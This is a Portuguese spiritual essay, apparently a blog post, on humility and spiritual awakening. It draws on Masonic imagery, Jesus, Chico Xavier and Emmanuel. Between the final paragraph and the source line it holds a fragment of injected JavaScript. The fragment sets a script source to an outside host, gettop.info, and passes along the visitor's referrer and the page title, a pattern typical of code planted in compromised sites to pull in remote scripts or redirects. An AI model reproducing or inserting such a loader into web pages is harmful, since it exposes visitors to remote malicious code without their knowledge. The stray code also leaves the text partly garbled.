Espiritualidade e humildade

 

Ensina a Maçonaria: “Antes de começar a caminhada você é apenas uma pedra bruta”. Só com o polimento ― despertamento das qualidades divinas presentes em todos os seres ―,torna-se pedra preciosa. Após ser admitido é neófito, nova planta. Se não for polido, terminará seus dias como pedra bruta e terá perdido sua encarnação.

Nesse sentido alertou Jesus: “De que adianta ao homem ganhar o mundo inteiro e perder sua alma?”. Mestre Chico Xavier ensinava que de 70 a 80% das pessoas após a morte permanecem entre nós ignorando seus estados de espíritos. Isso acontece porque a pobre humanidade pensa, basicamente,  em sobreviver ou acumular coisas materiais.

Requer-se do candidato ao despertamento espiritual, inicialmente, quatro qualidades básicas: boa vontade, sinceridade nas relações, solidariedade e humildade. Candidatos preguiçosos, curiosos, hipócritas, interesseiros devem ser descartados. Quanto aos orgulhosos, somente devem ser admitidos se concordarem com dura disciplina que deve ser estabelecida.

Admitir candidato orgulhoso e tratá-lo com complacência é dar-lhe meios para prejudicar-se. Quanto aos interesseiros, é preciso explicar-lhes que com espiritualidade nada se ganha.  Apenas se perde orgulho, desonestidade, preguiça, má-vontade, inveja, maldade, irresponsabilidade, estupidez etc.

A caminhada é feita de obstáculos. Os maiores, estão na própria pessoa. Melhorando-se como ser humano, e elevando a consciência, os obstáculos externos enfraquecem-se. Despertamento da vaidade, desequilíbrio sexual, ambição por posses materiais, desvio de finalidade e desânimo são os mais comuns.

Conhecer-se para fortalecer-se é o remédio indicado. Enquanto estiver vivo é preciso atenção consigo até o último minuto da vida. “Numa subida de mil degraus você pode cair até do 999”, ensinou o Mestre Emmanuel, e isso é humildade.

Caminhe!, mas evite fazê-lo sozinho. Esteja num grupo afim para permutar ideias, trabalhar, compreender e vencer. Até os grandes mestres que vieram à Terra precisaram de grupos de amigos para apoiar e receber apoio.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário